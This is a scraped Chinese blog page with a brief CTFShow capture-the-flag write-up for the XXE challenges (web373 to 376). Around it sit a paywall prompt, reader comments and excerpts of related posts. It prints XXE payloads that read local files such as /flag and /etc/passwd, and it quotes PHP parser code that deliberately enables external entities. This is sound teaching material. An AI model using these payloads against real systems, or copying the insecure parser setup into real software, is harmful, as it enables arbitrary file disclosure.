CTFShow XXE

最新推荐文章于 2024-03-30 23:48:14 发布

原创

最新推荐文章于 2024-03-30 23:48:14 发布 · 1.9k 阅读

3 ·

CC 4.0 BY-SA版权

文章标签：

#安全漏洞

前言

XXE 的漏洞在我的上一篇文章有讲过，这里就不多说，直接看题
XXE外部实体注入

web373

在这里插入图片描述
有回显的文件读取

<?xml version="1.0"?>
<!DOCTYPE xml [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<paidx0>
<ctfshow>&xxe;</ctfshow>
</paidx0>

在这里插入图片描述

web374~376

在这里插入图片描述
无回显的文件读取，禁用了版本号，问题不大不写

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

paidx0

关注关注

2
点赞
踩
3

收藏

觉得还不错? 一键收藏
5
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

ctfshow XXE

lwbcsd的博客

04-03

4717

xxe web373 有回显函数介绍 libxml_disable_entity_loader #禁用/启用加载外部实体的功能参数为true时为禁用，参数为false为启用 file_get_contents('php://input') #简单理解就是接受POST请求方式传的数据 loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD) #通过解析一个 XML 标签字符串来组成该文档 simplexml_import_dom #把 DOM 节点

CTFshow_Web_XXE——web373~377

Ho1aAs‘s Blog

05-07

3209

文章目录参考文章题解web373web374~376web377完参考文章一篇文章带你深入理解漏洞之 XXE 漏洞未知攻焉知防——XXE漏洞攻防题解 web373 常规XXE flag的路径是/flag // 允许加载外部实体 libxml_disable_entity_loader(false); // xml文件来源于数据流 $xmlfile = file_get_contents('php://input'); if(isset($xmlfile)){ $dom = new DOMDo

5 条评论您还未登录，请先登录后发表或查看评论

5 条评论

m0_52373172 2022.03.27
374 的xxe.xml 一直报错这是为什么
- paidx0回复m0_52373172 2022.03.27
  检查下文件写正确了吗，或者xxe.xml是可以访问到的吗

Goodric 2021.10.29
何老就是nb

抓手 2021.08.27
博主解释的很详细，一键三连了[face]monkey2:004.png[/face][face]monkey2:004.png[/face]

paidx0 2021.08.26
[face]emoji:008.png[/face]

ctfshow_XXE

qq_45951598的博客

03-24

415

文章目录WEB373 WEB373 这里先放看一下理解漏洞之 XXE 漏洞 error_reporting(0); libxml_disable_entity_loader(false); $xmlfile = file_get_contents('php://input'); if(isset($xmlfile)){ $dom = new DOMDocument(); //创建内部类Document对象 $dom->loadXML($xmlfile, LIBXML_NOENT |

ctfshowXXE

njh18790816639的博客

05-26

492

XXE(XML External Entity Injection) 全称为 XML 外部实体注入。 web373 error_reporting(0); libxml_disable_entity_loader(false); $xmlfile = file_get_contents('php://input');//以php伪协议接收一个值 if(isset($xmlfile)){ $dom = new DOMDocument();//创建内部类Document对象 $dom->l

CTFshow XXE

starttv的博客

11-10

675

为区分嵌套实体和实体之间的关系，可以通过单双引号来间隔开，引号中嵌套一个参数实体，其%号需要写成：%也可写为16进制的%(1)使用 % 实体名(这里面空格不能少) 在 DTD 中定义，并且只能在 DTD 中使用 %实体名;用bp抓包，可以发现传的内容是xml，并且在username处有回显，直接xxe。引用的实体，他在DTD 中定义，在 XML 文档中引用。(2)只有在 DTD 文件中，参数实体的声明才能引用其他实体。发现了过滤，用空格绕过一下就可以了，步骤和上题一样。过滤了大小写，还是用空格绕过。

ctfshow xxe

qq_50589021的博客

10-21

2541

前置知识理解漏洞之 XXE 漏洞从XML相关一步一步到XXE漏洞参考WP web373 error_reporting(0); libxml_disable_entity_loader(false); $xmlfile = file_get_contents('php://input'); if(isset($xmlfile)){ $dom = new DOMDocument(); $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTD

ctfshow—XXE

cosmoslin的博客

10-24

1194

XXE XXE：XML External Entity 即外部实体，从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时，解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml_load 默认情况下会解析外部实体，有XXE漏洞的标志性函数为simplexml_load_string（）。 XXE可导致读取任意文件，探测内网端口，攻击内网网站，发起拒绝服务攻击，执行系统命令等。Java中的XXE支持sun.net.www.p

CTFSHOW-XXE

m0_74456293的博客

06-03

625

CTFSHOW-XXE

CTFSHOW—XXE

灰太的表格的博客

01-31

515

(睡了一下午打算，通宵学习hhhh) web373 wa1ki0g标签可以随便改，ctfshow这个不可以。 !DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <wa1ki0g> <ctfshow>&xxe;</ctfshow> </wa1ki0g>

ctfshow--xxe

qq_51684648的博客

03-15

2744

ctfshow–xxe 有回显 <?php error_reporting(0); libxml_disable_entity_loader(false); //file_get_contents("php://input"),我么需要post我们的payload $xmlfile = file_get_contents('php://input'); if(isset($xmlfile)){ //DOMDocument,表示整个HTML或XML文档；作为文档树的根 $dom =

ctfshow web入门 XXE